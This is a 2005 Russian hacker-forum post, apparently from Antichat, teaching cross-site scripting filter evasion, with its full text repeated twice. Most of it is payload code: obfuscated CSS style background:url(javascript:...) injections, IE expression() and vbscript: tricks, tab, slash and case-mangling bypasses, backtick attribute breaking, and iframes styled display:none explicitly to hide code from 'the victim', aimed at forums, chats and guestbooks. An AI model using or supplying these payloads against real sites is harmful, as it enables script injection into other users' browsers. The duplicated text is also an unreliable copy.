Thesaurus
16.12.2005, 04:55
Всем привульки, с Новым Годом ибо Я!
Слушая непрестанное прошение от пользователей античата в моей холодной, скромной аськи написать побольше статей, Я решил все таки так и сделать - написать ещё одну Гениальную статью.
Прочитав свои недавно написанные статьи, Я пришёл к выводу, что они были не столько статьи, сколько уже готовые варианты, и мне захотелось написать настоящую статью, описав все более менее подробно, как работают вещи и почему.
Пришел Я к этому выводу из-за того, что увидел, что когда Я элементарным языком объясняю и показываю мои Гениальнейшие нахождения, то никто толком ничего и не понимает. Ну понятно почему, ведь сейчас из-за меня пошел ...хлынул лучше скажу народ, который мало что где читал.
Эта статья долгая, и почерпать могут из неё как и новички, так и Алгол.
Ну начнемс иМхо....
В одной из моих статей, Я с вами рассматривал разновидные варианты обхода фильтров в параметрах атрибута style.
Напомним себе материал той статьи, так как этот материал нам еще пригодится.
<html><body><a href=www. style="back\g\r\o\u\nd:\u\r\l\(\javasc\r\i\p\t\:a\le\r\t\ (\'\w\j\'\)\)" >wj<a></body></html>
<html><body><a href=www. style="/**/back\g\r\o\u\nd/**/:/**/\u/**/\r/**/\l/**/\(/**/\j/**/a/**/v/**/a/**/s/**/c/**/\r/**/\i\p/**/\t\:/**/a/**/\l/**/e/**/\r/**/\t/**/\(/**/\/**/'\w\j\'/**/\/**/)/**/\/**/)" >wj<a></body></html>
<html><body><a href=www. style="/**/back\g\r\o\u\nd/**/:/**/\u/**/\r/**/\l/**/\(/**/\j/**/a/**/v/**/a/**/s/**/c/**/\r/**/\i\p/**/\t\:/**/a/**/\l/**/e/**/\r/**/\t/**/\(/**/\/**//\w\j\//**/\/**/)/**/\/**/)" >wj<a></body></html>
<html><body><a href=www. style=/**/back\g\r\o\u\nd/**/:/**/\u/**/\r/**/\l/**/\(/**/\j/**/a/**/v/**/a/**/s/**/c/**/\r/**/\i\p/**/\t\:/**/a/**/\l/**/e/**/\r/**/\t/**/\(/**/\/**//\w\j\//**/\/**/)/**/\/**/) >wj<a></body></html>
<html><body><a href=www. style====/=*=*=/=back\g\r\o\u\nd=/=*=*=/=:=/*=*/\u/*=*/\r/*=*/l/*=*/\(/*=*/\j/*=*/a/*=*/v/*=*/a/*=*/s/*=*/c/*=*/\r/*=*/\i\p/*=*/\t\:/*=*/a/*=*/\l/*=*/e/*=*/\r/*=*/\t/*=*/\(/*=*=/=\=/=*=*//\w\j\//**/\/**/)/**/\/**/) >wj<a></body></html>
<html><body><a href=www. style====/=*=*=/=back\g\r\o\u\nd=/=*=*=/=:=/*=*/\u/*=*/\r/*=*/l/*=*/\(/*=*/\j/*=*/a/*=*/v/*=*/a/*=*/s/*=*/c/*=*/\r/*=*/\i\p/*=*/\t\:/*=*/a/*=*/\l/*=*/e/*=*/\r/*=*/\t/*=*/\(/*=*=/=\=/=*=*/'\w\j\'/*=*=/=\=/=*=*/)/*=*=/=\=/=*=*/) >wj<a></body></html>
Тут показывается, как ИЕ славно убирает всякие ошибки - до выполнения кода. Убирает ИЕ ошибки в параметрах как Я уже сказал раньше, ДО выполнения....и это мы с вами еще рассмотрим иМхо.
Как уже поняли, Я показывал новые обходы фильтров в параметре Style. А теперь Я бы хотел объяснить почему это
все в параметре style работает, а так же, показать методы обхода фильтров и в самих атрибутах.
Ну начнёмс иМхо заново.....
До атрибута style, можно поставить иМхо, что угодно...
Будет работать и так,
<html><body>
<WhiteJordan/style=background:url(javascript:alert(/wj/))>
</body></html>
И да, даже вот так,
<html><body>
<WhiteJordan/**/style=background:url(javascript:alert(/wj/))>
</body></html>
Да блин и вот так!
<html><body>
<WhiteJordan/*/style=background:url(javascript:alert(/wj/))>
</body></html>
Да [мат]! Так ТОЖЕ будет работать [мат]!
<html><body>
<White Jordan/*/style=background:url(javascript:alert(/wj/))>
</body></html>
Но проблема иногда бываем из-за того, что сам атрибут, "style", иногда просто фильтруется, а иногда к нему прибавляется ещё и крестик какой нить, (X) в этом случаи, это можно обойти вот так,
<html><body>
<WhiteJordan/StYlE =background:url(javascript:alert(/wj/))>
</body></html>
Где буквы S, Y и E, написаны большими буквами, а после большой буковки E, до знака равенства, (=) идут обычные пробелы.
И естественно сами пробелы, можно тоже заменить ещё и табуляциями....примерно вот так,
<html><body>
<WhiteJordan/StYlE =background:url(javascript:alert(/wj/))>
</body></html>
Тоже самое, можно употребить и для тега <img src=...>,
<html><body>
<img/src =javascript:alert(/wj/)>
</body></html>
Или
<html><body>
<img src =javascript:alert(/wj/)>
</body></html>
и
<html><body>
<img / src =javascript:alert(/wj/)>
</body></html>
Тут использовались табуляции ( ), в совокупности со слешом. (/)
Должен ещё добавить, что в середине атрибутов тега можно вписывать - что угодно...к примеру:
<html><body>
<img White Jordan src =javascript:alert(/wj/)>
</body></html>
Или вообще это все написать вот так,
<html><body>
<img/WhiteJordan/src=javascript:alert(/wj/)>
</body></html>
Атрибут img, можно и не сокращать:
<html><body>
<image/White/Jordan/src=javascript:alert(/wj/)>
</body></html>
Чуток познакомлю всех с материалом на разброс, на всякий пожарный если кто не знал или ещё что-нить такое..
В языке VbScript, в скобках, можно ТОЛЬКО вставить двойные кавычки, что-бы получить видное для глаз сообщение в коробке алёрта.
То есть вот так,
<html><body>
<img src=vbscript:alert(/wj/)>
</body></html>
Или так,
<html><body>
<img src=vbscript:alert(`wj`)>
</body></html>
Или вот так,
<html><body>
<img src=vbscript:alert('wj')>
</body></html>
Работать у вас не хера не будет.
Будет работать только вот так:
<html><body>
<img src=vbscript:alert("wj")>
</body></html>
В двух словах, если вы хотите в параметре (внутренности) атрибута тега использовать VbScript, а сам параметр заключить в кавычки, то для работоспособности вы должны будите написать вот так:
<html><body>
<img src='vbscript:alert("wj")'>
</body></html>
Или же так.
<html><body>
<img src=`vbscript:alert("wj")`>
</body></html>
Вот так у вас,
<html><body>
<img src="vbscript:alert("wj")">
</body></html>
Работать не будет.
До функции "expression", можно вставить - что угодно. Хоть так, ИЕ по барану:
<html><body>
<span style="WhiteJordan:expression(eval(window.alert(/wj/)))">wj</span>
</body></html>
Функцию "eval" писать тоже не обязательно, а функцию, "window.alert", можно сократить до "alert":
<html><body>
<span style="WhiteJordan:expression(alert(/wj/))">wj</span>
</body></html>
Или же так, создать свой собственный атрибут и назвать его, "span2", после чего его параметр будет обрабатываться JavaScript`ом.
<html><body>
<span style="WhiteJordan:expression(javascript(eval(span2)));" span2='alert(/wj2/);span2=null;'></span></body></html>
Можно конечно и так,
<html><body>
<span style='background:url(javascript:eval(window.alert ("wj")))'>
</body></html>
Чуток покажу вам браузеро не зависимые коды, то есть коды, которые работает во всех браузерах.
<html><body>
<iframe src="javascript:eval(this.wj); wj=this.wj='<scrip\x74>aler\x74(/wj/);</scrip\x74>'">
</body></html>
<html><body>
<iframe src="javascript:eval(this.wj); wj=this.wj='<script>alert(/wj/);</script>'">
</body></html>
<html><body><iframe src=javascript:alert(/wj/) style='display:none;'></body></html>
<html><body>
<iframe src='javascript:eval(this.wj1); wj1=alert(/wj2/);' style='display:none'>
</body></html>
Кратко дам описание,
Потому что iframe src после знака равенства настроен на то, чтобы получать источник/адрес, то используя это, мы зададим ему вместо источника - JavaScript. Само слово, "src" сокращенна от английского слова, "source" что в переводе на русский язык означает = Источник. Функция, "eval", сокращенна от Английского слова, "Evaluate", и в переводе с Английского слова на русский, (В нашем случае) означает = "Обрабатывать, обработать". Английское слово, "This", означает в переводе на русский язык = "Это, вот это". А что именно, "это"? В данном случае мы указываем свой собственный атрибут, который мы наименовали wj1, и указали JavaScript`у, чтобы он наш новый атрибут - обработал. Атрибут и его параметр, style=display:none; вписан чтобы спрятать наш код от глаз нашей жертвы, и приведенный код, не имеет браузер зависимость и работает во всех трех популярных браузерах ИЕ, Фаерфокс и Опера. (С лева на права по проценту ихнего использования.)
Хочу вернутся чуток к атрибуту style. Как Я уже говорил, до атрибута, "style", можно писать что угодно, лишь бы после него шёл знак равенства. (=) В других словах, совсем не обязательно писать <span style=...> - для его работоспособности. Причем сам атрибут, "style", можно вписывать и с любыми другими атрибутами, а он все равно будет работать.
К примеру, возьмем тег ссылки,
<a href=http://www.wj.com>http://www.wj.com</a>
И впишем туда наш атрибут, "style",
<a href=http://www.wj.com style=background:url(javascript:alert(/wj/))>http://www.wj.com</a>
Это все хорошо....но если Я теперь пойду дальше, то те люди которые не имеют знаний - ничего не поймут.
Объясню что и как, используя тег ссылки, для краткого объяснения.
<a href=http://www.wj.com>wj1</a>
С начало идет левая угловая скобка, (<) открывающая тег, потом идет атрибут тега, (a href) потом идет знак равенства, (=) который говорит, что атрибут закончился и начался параметр атрибута, сразу после знака равенства, (=) идет параметр атрибута, (http://www.wj.com) потом идет правая закрывающая угловая скобка, (>) после нее идёт наше видимое наименование нашего тега, (wj1) а чтобы указать где наше именование кончается, мы указываем атрибут </a> и у нас получается работоспособный тег ссылки. После клика на эту ссылку, параметр атрибута образно говоря, вставится в поле адреса в верхнею часть нашего браузера, и мы на лыжах поедем по этому адресу.
Давайте посмотрим, что случится если мы в параметре атрибута - впишем пробел.
<a href=http://www.wj .com>http://www.wj.com</a>
Или табуляцию...
<a href=http://www.wj .com>http://www.wj.com</a>
А вот что будет...слово, ".com", которое до этого у нас было параметром тега, теперь из-за пробела ( ) или табуляции, ( ) стало атрибутом и теперь ждет, чтобы мы ей указали знак равенства, (=) чтобы начать свой собственный параметр.
А есть ли какой нибудь способ, чтобы в параметре атрибута указать пробел или табуляцию, и не сделать все, что идет после пробела и табуляции - атрибутом?...
Ответ = Да, есть.
Для этого в параметр тега сразу после знака равенства, вставляется одна из двух видов кавычек - одинарная, (') или двойная. (")
Чуток отвлекусь и расскажу вам кратко о кавычках....
Легальных, работоспособных кавычек в языке JavaScript - всего две. Одинарная, (') и двойная. (") Многие разработчики браузеров считают, что должна существовать только одна кавычка - двойная. Одинарную многие разработчики браузеров как легальную в языке JavaScript и в других языках - признавать не хотят. (Хоть про JavaScript чуток не в тему, однако не беда если напомню иМхо)
Написав наш код через двойные кавычки,
<a href="http://www.wj.com">http://www.wj.com</a>
Мы тем самом, указали атрибуту, что все, что будет идти в середине двойных кавычек - будет параметром атрибута тега и будет параметром атрибута тега в не зависимости если это пробел, табуляция, или даже левая или правая угловая скобка. То есть мы теперь смело можем вписывать в параметр тега пробел, ( )
<a href="http://www.wj .com">http://www.wj.com</a>
Табуляцию ( )
<a href="http://www.wj .com">http://www.wj.com</a>
Одинарную кавычку (')
<a href="http://www.wj'.com">http://www.wj.com</a>
Угловые скобки,
<a href="http://www.wj <script>alert('wj')</script>.com">http://www.wj.com</a>
И при этом все это, будет в параметрах нашего тега.
А что будет, если мы в наш параметр, который теперь заключен в двойные кавычки, впишем ещё одну двойную кавычку по середине?....
<a href="http://www.wj".com">http://www.wj.com</a>
А будет следующие....из-за того, что мы теперь закрыли нашей двойной кавычкой параметр атрибута вставив её в середину нашего параметра, из-за этого, наше слово, ".com", которое у нас раньше было параметром - стало атрибутом.
Ещё один момент, когда параметр заключен в кавычки, то не обязательно после кавычек вписывать пробел или табуляцию, чтобы иметь рабочий атрибут. То есть вполне легально написать так:
<html><body>
<a href="http://www.wj"style='background:url(javascript:alert(/wj/))'.com">http://www.wj.com</a></body></html>
И иметь работоспособный код. Не обязательно до атрибута, "style", писать пробел.
Теперь давайте рассмотрим альтернативу тегов, которые обычно называются ББ кодами и используются в e-mail`ах, в форумах, в чатах, в гостевых книгах и в других местах - как альтернативы.
В целях безопасности а главное удобности, люди пришли к выводу, что не обязательно пользователю вписывать
<a href="http://www.wj.com">http://www.wj.com</a>
Чтобы у него получилась рабочая ссылка, когда ему просто можно написать:
http://www.wj.com
Послать это со своим сообщением, а система, обработавши это, преобразует эти ББ коды в следующий результат:
<a href="http://www.wj.com">http://www.wj.com</a>
Давайте сравним их... =)))
<a href="http://www.wj.com">http://www.wj.com</a>
http://www.wj.com
Лепота....=)))))
При этом легко понять, что если мы впишем в наши ББ коды двойную кавычку,
http://www.wj.com (http://www.wj".com)
То эта безобидная кавычка, может закрыть параметр, а нам дать возможность вписать свой собственный атрибут для атаки.
<a href="http://www.wj".com">http://www.wj.com</a>
Чтобы такого не было, люди придумали вставлять фильтры, которые бы просканивали ввод пользователя и нашедши запретные объекты, или полностью бы удаляли эти запретные объекты, или изменяли бы эти объекты - на ихние зашифрованные альтернативы.
То есть сейчас почти везде, во всех форумах, чатах и гостевых книгах, написав:
http://www.wj.com (http://www.wj".com)
Мы бы получили следующий результат:
<a href="http://www.wjFILTERED.com">http://www.wj.com</a>
И тем самым, выйти из параметра атрибута - у нас бы не получилось.
А что если двойная кавычка НЕ отфильтрировалась....что вписывать тогда, чтобы совершить атаку?
Есть такая вещь, по названию "Обратный Апостроф". (`) Он не является ограничителем строк в таких языках как JavaScript, VbScript, Jscript, CSS, и так далее, однако он как раз таки является ограничителем строк, в языках HTML и XHTML, но только в браузере ИЕ. (Среди Оперы, Фаерфокс и ИЕ,)
Короче браузер ИЕ, признает одинарную кавычку, (') двойную кавычку (") и обратный апостроф (`) - как ограничителями строк в параметрах атрибутов только в языках HTML и XHTML.
Другие браузера как Опера и Фаерфокс - признают только одинарную и двойную кавычку в языках HTML и XHTML, как границами параметров.
Как все уже знаем, браузер ИЕ, может убирать не смертельные ошибки программиста....приведу несколько примеров:
<img src="java script:alert(/wj/)">
Что сделает ИЕ в этом случае? Правильно! Он ее уберет...как проверить, что он ее именно убирает?
Пишем вот так в доказательство вам:
<img src="javascript:alert( /wj/ )">
Выскочит алёрт.
<img src="javascript:alert(/ wj /)"> Выскочит алёрт.
<img src="javascript:alert(/ /)">
Алерт НЕ выскочит, потому что табуляция будет вырезана браузером ИЕ и в итоге у нас получится равно сильно следующему скрипту:
<img src="javascript:alert(//)">
То есть два не одинаково написанные скрипты:
<img src="javascript:alert(/ /)">
И
<img src="javascript:alert(//)">
- Выполнятся одинаково.
Являются ли табуляции в этих случаях ошибками? Да! Убирают ли другие браузеры эти ошибки как это делает браузер ИЕ?
лоооол Да! Хоть другие браузера как Фаерфокс и Опера этому менее и научены, (ИЕ браузер делает это лучших всех остальных браузеров,) но Фаерфокс и Опера работают по такому же принципу.
И это совсем не значит, что ИЕ является из-за этого "хуже" чем Фаерфокс или Опера или другие браузеры. Просто из-за того, что Микрасофт хотел, чтобы его браузер был бы самым распространенным по использованию, Микрасофт именно по этой причине и создал ИЕ так - как он собственно и создан. И речь совсем не идёт о глюках или ошибках ИЕ, а вообще в каком браузере их нет? И кстати в плане того, чтобы ИЕ стал наибольше использован, то в этом плане, Микрасофт свою цель - достиг.
Фаерфокс и Опера однако, придерживаются более жёсткой системе и менее научены угадывать или убирать ошибки программистов во время обрабатывания определенного языка.
А теперь мне придется закончить писать и ответить на свою статью, потому что статью у меня получилась очень долгая, а лимит здесь на форуме состоит из 20000 символов.
Слушая непрестанное прошение от пользователей античата в моей холодной, скромной аськи написать побольше статей, Я решил все таки так и сделать - написать ещё одну Гениальную статью.
Прочитав свои недавно написанные статьи, Я пришёл к выводу, что они были не столько статьи, сколько уже готовые варианты, и мне захотелось написать настоящую статью, описав все более менее подробно, как работают вещи и почему.
Пришел Я к этому выводу из-за того, что увидел, что когда Я элементарным языком объясняю и показываю мои Гениальнейшие нахождения, то никто толком ничего и не понимает. Ну понятно почему, ведь сейчас из-за меня пошел ...хлынул лучше скажу народ, который мало что где читал.
Эта статья долгая, и почерпать могут из неё как и новички, так и Алгол.
Ну начнемс иМхо....
В одной из моих статей, Я с вами рассматривал разновидные варианты обхода фильтров в параметрах атрибута style.
Напомним себе материал той статьи, так как этот материал нам еще пригодится.
<html><body><a href=www. style="back\g\r\o\u\nd:\u\r\l\(\javasc\r\i\p\t\:a\le\r\t\ (\'\w\j\'\)\)" >wj<a></body></html>
<html><body><a href=www. style="/**/back\g\r\o\u\nd/**/:/**/\u/**/\r/**/\l/**/\(/**/\j/**/a/**/v/**/a/**/s/**/c/**/\r/**/\i\p/**/\t\:/**/a/**/\l/**/e/**/\r/**/\t/**/\(/**/\/**/'\w\j\'/**/\/**/)/**/\/**/)" >wj<a></body></html>
<html><body><a href=www. style="/**/back\g\r\o\u\nd/**/:/**/\u/**/\r/**/\l/**/\(/**/\j/**/a/**/v/**/a/**/s/**/c/**/\r/**/\i\p/**/\t\:/**/a/**/\l/**/e/**/\r/**/\t/**/\(/**/\/**//\w\j\//**/\/**/)/**/\/**/)" >wj<a></body></html>
<html><body><a href=www. style=/**/back\g\r\o\u\nd/**/:/**/\u/**/\r/**/\l/**/\(/**/\j/**/a/**/v/**/a/**/s/**/c/**/\r/**/\i\p/**/\t\:/**/a/**/\l/**/e/**/\r/**/\t/**/\(/**/\/**//\w\j\//**/\/**/)/**/\/**/) >wj<a></body></html>
<html><body><a href=www. style====/=*=*=/=back\g\r\o\u\nd=/=*=*=/=:=/*=*/\u/*=*/\r/*=*/l/*=*/\(/*=*/\j/*=*/a/*=*/v/*=*/a/*=*/s/*=*/c/*=*/\r/*=*/\i\p/*=*/\t\:/*=*/a/*=*/\l/*=*/e/*=*/\r/*=*/\t/*=*/\(/*=*=/=\=/=*=*//\w\j\//**/\/**/)/**/\/**/) >wj<a></body></html>
<html><body><a href=www. style====/=*=*=/=back\g\r\o\u\nd=/=*=*=/=:=/*=*/\u/*=*/\r/*=*/l/*=*/\(/*=*/\j/*=*/a/*=*/v/*=*/a/*=*/s/*=*/c/*=*/\r/*=*/\i\p/*=*/\t\:/*=*/a/*=*/\l/*=*/e/*=*/\r/*=*/\t/*=*/\(/*=*=/=\=/=*=*/'\w\j\'/*=*=/=\=/=*=*/)/*=*=/=\=/=*=*/) >wj<a></body></html>
Тут показывается, как ИЕ славно убирает всякие ошибки - до выполнения кода. Убирает ИЕ ошибки в параметрах как Я уже сказал раньше, ДО выполнения....и это мы с вами еще рассмотрим иМхо.
Как уже поняли, Я показывал новые обходы фильтров в параметре Style. А теперь Я бы хотел объяснить почему это
все в параметре style работает, а так же, показать методы обхода фильтров и в самих атрибутах.
Ну начнёмс иМхо заново.....
До атрибута style, можно поставить иМхо, что угодно...
Будет работать и так,
<html><body>
<WhiteJordan/style=background:url(javascript:alert(/wj/))>
</body></html>
И да, даже вот так,
<html><body>
<WhiteJordan/**/style=background:url(javascript:alert(/wj/))>
</body></html>
Да блин и вот так!
<html><body>
<WhiteJordan/*/style=background:url(javascript:alert(/wj/))>
</body></html>
Да [мат]! Так ТОЖЕ будет работать [мат]!
<html><body>
<White Jordan/*/style=background:url(javascript:alert(/wj/))>
</body></html>
Но проблема иногда бываем из-за того, что сам атрибут, "style", иногда просто фильтруется, а иногда к нему прибавляется ещё и крестик какой нить, (X) в этом случаи, это можно обойти вот так,
<html><body>
<WhiteJordan/StYlE =background:url(javascript:alert(/wj/))>
</body></html>
Где буквы S, Y и E, написаны большими буквами, а после большой буковки E, до знака равенства, (=) идут обычные пробелы.
И естественно сами пробелы, можно тоже заменить ещё и табуляциями....примерно вот так,
<html><body>
<WhiteJordan/StYlE =background:url(javascript:alert(/wj/))>
</body></html>
Тоже самое, можно употребить и для тега <img src=...>,
<html><body>
<img/src =javascript:alert(/wj/)>
</body></html>
Или
<html><body>
<img src =javascript:alert(/wj/)>
</body></html>
и
<html><body>
<img / src =javascript:alert(/wj/)>
</body></html>
Тут использовались табуляции ( ), в совокупности со слешом. (/)
Должен ещё добавить, что в середине атрибутов тега можно вписывать - что угодно...к примеру:
<html><body>
<img White Jordan src =javascript:alert(/wj/)>
</body></html>
Или вообще это все написать вот так,
<html><body>
<img/WhiteJordan/src=javascript:alert(/wj/)>
</body></html>
Атрибут img, можно и не сокращать:
<html><body>
<image/White/Jordan/src=javascript:alert(/wj/)>
</body></html>
Чуток познакомлю всех с материалом на разброс, на всякий пожарный если кто не знал или ещё что-нить такое..
В языке VbScript, в скобках, можно ТОЛЬКО вставить двойные кавычки, что-бы получить видное для глаз сообщение в коробке алёрта.
То есть вот так,
<html><body>
<img src=vbscript:alert(/wj/)>
</body></html>
Или так,
<html><body>
<img src=vbscript:alert(`wj`)>
</body></html>
Или вот так,
<html><body>
<img src=vbscript:alert('wj')>
</body></html>
Работать у вас не хера не будет.
Будет работать только вот так:
<html><body>
<img src=vbscript:alert("wj")>
</body></html>
В двух словах, если вы хотите в параметре (внутренности) атрибута тега использовать VbScript, а сам параметр заключить в кавычки, то для работоспособности вы должны будите написать вот так:
<html><body>
<img src='vbscript:alert("wj")'>
</body></html>
Или же так.
<html><body>
<img src=`vbscript:alert("wj")`>
</body></html>
Вот так у вас,
<html><body>
<img src="vbscript:alert("wj")">
</body></html>
Работать не будет.
До функции "expression", можно вставить - что угодно. Хоть так, ИЕ по барану:
<html><body>
<span style="WhiteJordan:expression(eval(window.alert(/wj/)))">wj</span>
</body></html>
Функцию "eval" писать тоже не обязательно, а функцию, "window.alert", можно сократить до "alert":
<html><body>
<span style="WhiteJordan:expression(alert(/wj/))">wj</span>
</body></html>
Или же так, создать свой собственный атрибут и назвать его, "span2", после чего его параметр будет обрабатываться JavaScript`ом.
<html><body>
<span style="WhiteJordan:expression(javascript(eval(span2)));" span2='alert(/wj2/);span2=null;'></span></body></html>
Можно конечно и так,
<html><body>
<span style='background:url(javascript:eval(window.alert ("wj")))'>
</body></html>
Чуток покажу вам браузеро не зависимые коды, то есть коды, которые работает во всех браузерах.
<html><body>
<iframe src="javascript:eval(this.wj); wj=this.wj='<scrip\x74>aler\x74(/wj/);</scrip\x74>'">
</body></html>
<html><body>
<iframe src="javascript:eval(this.wj); wj=this.wj='<script>alert(/wj/);</script>'">
</body></html>
<html><body><iframe src=javascript:alert(/wj/) style='display:none;'></body></html>
<html><body>
<iframe src='javascript:eval(this.wj1); wj1=alert(/wj2/);' style='display:none'>
</body></html>
Кратко дам описание,
Потому что iframe src после знака равенства настроен на то, чтобы получать источник/адрес, то используя это, мы зададим ему вместо источника - JavaScript. Само слово, "src" сокращенна от английского слова, "source" что в переводе на русский язык означает = Источник. Функция, "eval", сокращенна от Английского слова, "Evaluate", и в переводе с Английского слова на русский, (В нашем случае) означает = "Обрабатывать, обработать". Английское слово, "This", означает в переводе на русский язык = "Это, вот это". А что именно, "это"? В данном случае мы указываем свой собственный атрибут, который мы наименовали wj1, и указали JavaScript`у, чтобы он наш новый атрибут - обработал. Атрибут и его параметр, style=display:none; вписан чтобы спрятать наш код от глаз нашей жертвы, и приведенный код, не имеет браузер зависимость и работает во всех трех популярных браузерах ИЕ, Фаерфокс и Опера. (С лева на права по проценту ихнего использования.)
Хочу вернутся чуток к атрибуту style. Как Я уже говорил, до атрибута, "style", можно писать что угодно, лишь бы после него шёл знак равенства. (=) В других словах, совсем не обязательно писать <span style=...> - для его работоспособности. Причем сам атрибут, "style", можно вписывать и с любыми другими атрибутами, а он все равно будет работать.
К примеру, возьмем тег ссылки,
<a href=http://www.wj.com>http://www.wj.com</a>
И впишем туда наш атрибут, "style",
<a href=http://www.wj.com style=background:url(javascript:alert(/wj/))>http://www.wj.com</a>
Это все хорошо....но если Я теперь пойду дальше, то те люди которые не имеют знаний - ничего не поймут.
Объясню что и как, используя тег ссылки, для краткого объяснения.
<a href=http://www.wj.com>wj1</a>
С начало идет левая угловая скобка, (<) открывающая тег, потом идет атрибут тега, (a href) потом идет знак равенства, (=) который говорит, что атрибут закончился и начался параметр атрибута, сразу после знака равенства, (=) идет параметр атрибута, (http://www.wj.com) потом идет правая закрывающая угловая скобка, (>) после нее идёт наше видимое наименование нашего тега, (wj1) а чтобы указать где наше именование кончается, мы указываем атрибут </a> и у нас получается работоспособный тег ссылки. После клика на эту ссылку, параметр атрибута образно говоря, вставится в поле адреса в верхнею часть нашего браузера, и мы на лыжах поедем по этому адресу.
Давайте посмотрим, что случится если мы в параметре атрибута - впишем пробел.
<a href=http://www.wj .com>http://www.wj.com</a>
Или табуляцию...
<a href=http://www.wj .com>http://www.wj.com</a>
А вот что будет...слово, ".com", которое до этого у нас было параметром тега, теперь из-за пробела ( ) или табуляции, ( ) стало атрибутом и теперь ждет, чтобы мы ей указали знак равенства, (=) чтобы начать свой собственный параметр.
А есть ли какой нибудь способ, чтобы в параметре атрибута указать пробел или табуляцию, и не сделать все, что идет после пробела и табуляции - атрибутом?...
Ответ = Да, есть.
Для этого в параметр тега сразу после знака равенства, вставляется одна из двух видов кавычек - одинарная, (') или двойная. (")
Чуток отвлекусь и расскажу вам кратко о кавычках....
Легальных, работоспособных кавычек в языке JavaScript - всего две. Одинарная, (') и двойная. (") Многие разработчики браузеров считают, что должна существовать только одна кавычка - двойная. Одинарную многие разработчики браузеров как легальную в языке JavaScript и в других языках - признавать не хотят. (Хоть про JavaScript чуток не в тему, однако не беда если напомню иМхо)
Написав наш код через двойные кавычки,
<a href="http://www.wj.com">http://www.wj.com</a>
Мы тем самом, указали атрибуту, что все, что будет идти в середине двойных кавычек - будет параметром атрибута тега и будет параметром атрибута тега в не зависимости если это пробел, табуляция, или даже левая или правая угловая скобка. То есть мы теперь смело можем вписывать в параметр тега пробел, ( )
<a href="http://www.wj .com">http://www.wj.com</a>
Табуляцию ( )
<a href="http://www.wj .com">http://www.wj.com</a>
Одинарную кавычку (')
<a href="http://www.wj'.com">http://www.wj.com</a>
Угловые скобки,
<a href="http://www.wj <script>alert('wj')</script>.com">http://www.wj.com</a>
И при этом все это, будет в параметрах нашего тега.
А что будет, если мы в наш параметр, который теперь заключен в двойные кавычки, впишем ещё одну двойную кавычку по середине?....
<a href="http://www.wj".com">http://www.wj.com</a>
А будет следующие....из-за того, что мы теперь закрыли нашей двойной кавычкой параметр атрибута вставив её в середину нашего параметра, из-за этого, наше слово, ".com", которое у нас раньше было параметром - стало атрибутом.
Ещё один момент, когда параметр заключен в кавычки, то не обязательно после кавычек вписывать пробел или табуляцию, чтобы иметь рабочий атрибут. То есть вполне легально написать так:
<html><body>
<a href="http://www.wj"style='background:url(javascript:alert(/wj/))'.com">http://www.wj.com</a></body></html>
И иметь работоспособный код. Не обязательно до атрибута, "style", писать пробел.
Теперь давайте рассмотрим альтернативу тегов, которые обычно называются ББ кодами и используются в e-mail`ах, в форумах, в чатах, в гостевых книгах и в других местах - как альтернативы.
В целях безопасности а главное удобности, люди пришли к выводу, что не обязательно пользователю вписывать
<a href="http://www.wj.com">http://www.wj.com</a>
Чтобы у него получилась рабочая ссылка, когда ему просто можно написать:
http://www.wj.com
Послать это со своим сообщением, а система, обработавши это, преобразует эти ББ коды в следующий результат:
<a href="http://www.wj.com">http://www.wj.com</a>
Давайте сравним их... =)))
<a href="http://www.wj.com">http://www.wj.com</a>
http://www.wj.com
Лепота....=)))))
При этом легко понять, что если мы впишем в наши ББ коды двойную кавычку,
http://www.wj.com (http://www.wj".com)
То эта безобидная кавычка, может закрыть параметр, а нам дать возможность вписать свой собственный атрибут для атаки.
<a href="http://www.wj".com">http://www.wj.com</a>
Чтобы такого не было, люди придумали вставлять фильтры, которые бы просканивали ввод пользователя и нашедши запретные объекты, или полностью бы удаляли эти запретные объекты, или изменяли бы эти объекты - на ихние зашифрованные альтернативы.
То есть сейчас почти везде, во всех форумах, чатах и гостевых книгах, написав:
http://www.wj.com (http://www.wj".com)
Мы бы получили следующий результат:
<a href="http://www.wjFILTERED.com">http://www.wj.com</a>
И тем самым, выйти из параметра атрибута - у нас бы не получилось.
А что если двойная кавычка НЕ отфильтрировалась....что вписывать тогда, чтобы совершить атаку?
Есть такая вещь, по названию "Обратный Апостроф". (`) Он не является ограничителем строк в таких языках как JavaScript, VbScript, Jscript, CSS, и так далее, однако он как раз таки является ограничителем строк, в языках HTML и XHTML, но только в браузере ИЕ. (Среди Оперы, Фаерфокс и ИЕ,)
Короче браузер ИЕ, признает одинарную кавычку, (') двойную кавычку (") и обратный апостроф (`) - как ограничителями строк в параметрах атрибутов только в языках HTML и XHTML.
Другие браузера как Опера и Фаерфокс - признают только одинарную и двойную кавычку в языках HTML и XHTML, как границами параметров.
Как все уже знаем, браузер ИЕ, может убирать не смертельные ошибки программиста....приведу несколько примеров:
<img src="java script:alert(/wj/)">
Что сделает ИЕ в этом случае? Правильно! Он ее уберет...как проверить, что он ее именно убирает?
Пишем вот так в доказательство вам:
<img src="javascript:alert( /wj/ )">
Выскочит алёрт.
<img src="javascript:alert(/ wj /)"> Выскочит алёрт.
<img src="javascript:alert(/ /)">
Алерт НЕ выскочит, потому что табуляция будет вырезана браузером ИЕ и в итоге у нас получится равно сильно следующему скрипту:
<img src="javascript:alert(//)">
То есть два не одинаково написанные скрипты:
<img src="javascript:alert(/ /)">
И
<img src="javascript:alert(//)">
- Выполнятся одинаково.
Являются ли табуляции в этих случаях ошибками? Да! Убирают ли другие браузеры эти ошибки как это делает браузер ИЕ?
лоооол Да! Хоть другие браузера как Фаерфокс и Опера этому менее и научены, (ИЕ браузер делает это лучших всех остальных браузеров,) но Фаерфокс и Опера работают по такому же принципу.
И это совсем не значит, что ИЕ является из-за этого "хуже" чем Фаерфокс или Опера или другие браузеры. Просто из-за того, что Микрасофт хотел, чтобы его браузер был бы самым распространенным по использованию, Микрасофт именно по этой причине и создал ИЕ так - как он собственно и создан. И речь совсем не идёт о глюках или ошибках ИЕ, а вообще в каком браузере их нет? И кстати в плане того, чтобы ИЕ стал наибольше использован, то в этом плане, Микрасофт свою цель - достиг.
Фаерфокс и Опера однако, придерживаются более жёсткой системе и менее научены угадывать или убирать ошибки программистов во время обрабатывания определенного языка.
А теперь мне придется закончить писать и ответить на свою статью, потому что статью у меня получилась очень долгая, а лимит здесь на форуме состоит из 20000 символов.